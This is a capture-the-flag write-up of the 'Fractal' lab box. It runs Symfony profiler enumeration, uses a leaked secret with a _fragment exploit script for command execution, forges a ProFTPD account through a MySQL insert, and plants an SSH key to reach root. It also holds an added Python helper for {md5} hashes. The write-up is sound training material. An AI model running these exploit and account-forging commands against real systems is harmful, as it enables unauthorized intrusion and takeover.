Proving Grounds - Fractal

Fractal was an extremely useful box to learn and train my MySQL skills. It starts with identifying a Symfony CMS through HTTP enumeration.

The Symfony profiler was explored, leading to finding sensitive files and obtaining database credentials.

Using these credentials, a Symfony exploit script was executed to achieve Remote Code Execution (RCE) and gain a reverse shell.

Privilege escalation involved creating a new user via MySQL, allowing SSH access with elevated privileges, eventually leading to root access.

Diagram

graph TD
    A[Host Enumeration] -->|Nmap Scan| B[HTTP Enumeration]
    B -->|Identify Symfony| C[Explore Symfony Profiler]
    C -->|Find Sensitive Files| D[Exploit Symfony]
    D -->|Obtain Database Credentials| E[Use Symfony Exploit Script]
    E -->|RCE| F[Reverse Shell]
    F -->|Privilege Escalation| G[Create user via MySQL]
    G -->|Create User| H[SSH Access]
    H -->|User Benoit| I[Root Access]

Information Gathering

Port Scan


  • nmap -sS -Pn -n --open -p- -T4 192.168.192.233

  • nmap -sVC -p 21,22,80 192.168.192.233

Enumeration

HTTP 80


I forced an error to appear.

I accessed it as if it were an admin panel.

Checking the branch on GitHub, it is possible to view documentation about upgrading Symfony 3.x, so we might find sensitive files.

Then I decided to investigate the _profiler to find directories, since passing it directly as a URL gave me nothing. I filtered out all these response sizes to avoid noise.

  • ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.192.233/app_dev.php/_profiler/FUZZ -fs 47400,47401,47402,47403,47404,47405,47406,47407,47408,47409,47410,47411,47412,47413,47414,47415,47416,47417,47418,47419,47420,47421,47422,47423,47424,47425,47426,47427,47428,47429,47430,47431,47432,47433,47434,47435,47436,47437,47438,47439,47440,47441,47442,47443,47444,47445,47446,47447,47448,47449,47450,47451,47452,47453,47454,47455,47456,47457,47458,47459,47460,47461,47462,47463,47464,47465,47466,47467,47468,47469,47470,47471,47472,47473,47474,47475,47476,47477,47478,47479,47480,47481,47482,47483,47484,47485,47486,47487,47488,47489,47490,47491,47492,47493,47494,47495,47496,47497,47498,47499

Found two directories, “latest” and “open”.

Investigating “latest” turned up nothing…

It says the file is not readable, so I will try to read the “.yml” file found on GitHub.

Accessing that URL, I found database credentials.

Exploitation

After a lot of searching, I found the following article: https://al1z4deh.medium.com/how-i-hacked-28-sites-at-once-rce-5458211048d5

It contains an exploit for the _fragment endpoint. I tried to enumerate the secret but found nothing.

  • python3 secret_fragment_exploit.py http://192.168.192.233/_fragment

Then I decided to use the secret found in the database.

  • python3 secret_fragment_exploit.py 'http://192.168.192.233/_fragment' --method 2 --secret '48a8538e6260789558f0dfe29861c05b' --algo 'sha256' --internal-url 'http://192.168.192.233/_fragment' --function system --parameters "id"

Accessing the generated URL, I was able to execute commands.

Privilege Escalation

  • cat /etc/passwd → there is the user benoit

I previously obtained database information; let’s check it and try to connect.

  • netstat -nlpt

I tried to access MySQL with the credentials obtained earlier but failed. Then I looked for cron, kernel version, SSH, etc., but found nothing. So I decided to look at the FTP configuration files.

  • ls -lah /etc/proftpd

  • cat sql.conf

Let’s connect to SQL.

  • mysql -u proftpd -p proftpd → password: protfpd_with_MYSQL_password

There seems to be a password stored for the www user for ProFTPD access, so FTP authentication goes through ProFTPD.

I will create a new password for the user benoit who already exists in the system.

Passwords are stored in the {md5} base64-encoded format, so the right way to generate a password for the user benoit is the base64-encoded MD5 hash method.

  • /bin/echo "{md5}"$(/bin/echo -n "hendrich" | openssl dgst -binary -md5 | openssl enc -base64)
  • INSERT INTO `ftpuser` (`id`, `userid`, `passwd`, `uid`, `gid`, `homedir`, `shell`, `count`, `accessed`, `modified`) VALUES (NULL, 'benoit', '{md5}wZjbZseC3NVjPeEobwukRg==', 1000, 1000, '/', '/bin/bash', 0, NOW(), NOW());
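As an added example (not code from the original post), the same {md5} scheme implemented in Python: a generator equivalent to the openssl pipeline above, a verifier that behaves the way the server does, and a small audit over ftpuser rows. The ftpuser columns follow the INSERT above; the www row and its hash are constructed placeholders, not values from the box.

```python
import base64
import binascii
import hashlib
import hmac

# ProFTPD mod_sql "{md5}" auth type: the stored value is the literal prefix
# "{md5}" followed by the Base64 encoding of the raw 16-byte MD5 digest of the
# plaintext (what the openssl pipeline above produces). No salt is involved.
SCHEME = "{md5}"


def proftpd_md5_hash(password: str) -> str:
    """Produce the stored form of a password for ProFTPD's {md5} auth type."""
    digest = hashlib.md5(password.encode("utf-8")).digest()  # raw bytes, not hex
    return SCHEME + base64.b64encode(digest).decode("ascii")


def proftpd_md5_verify(stored: str, candidate: str) -> bool:
    """Check a candidate password against a stored {md5} value."""
    if not stored.startswith(SCHEME):
        return False  # some other scheme (e.g. crypt); not handled here
    try:
        expected = base64.b64decode(stored[len(SCHEME):], validate=True)
    except (binascii.Error, ValueError):
        return False  # malformed Base64 in the stored column
    if len(expected) != hashlib.md5().digest_size:
        return False
    actual = hashlib.md5(candidate.encode("utf-8")).digest()
    return hmac.compare_digest(expected, actual)


def audit_ftpuser_rows(rows):
    """Flag ftpuser rows worth a defender's attention: unsalted {md5} hashes
    (cheap to crack offline) and accounts whose FTP home is the filesystem root."""
    findings = []
    for row in rows:
        if row["passwd"].startswith(SCHEME):
            findings.append((row["userid"], "unsalted {md5} password hash"))
        if row["homedir"] == "/":
            findings.append((row["userid"], "homedir is filesystem root"))
    return findings


# Constructed sample rows using the ftpuser columns from the INSERT above.
# The www row's hash is a made-up placeholder, not a value from the box.
SAMPLE_ROWS = [
    {"userid": "benoit", "passwd": proftpd_md5_hash("hendrich"),
     "homedir": "/", "shell": "/bin/bash"},
    {"userid": "www", "passwd": "$1$placeholder$placeholder",
     "homedir": "/var/www", "shell": "/bin/false"},
]
```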

Now log in to FTP.

  • ftp 192.168.192.233 benoit:hendrich

  • ssh-keygen

  • cp id_rsa.pub authorized_keys
  • mkdir .ssh
  • put authorized_keys

  • ssh -i id_rsa benoit@192.168.192.233

  • sudo -l → benoit has permission to execute everything; sudo su works

  • flag

This post is licensed under CC BY 4.0 by the author.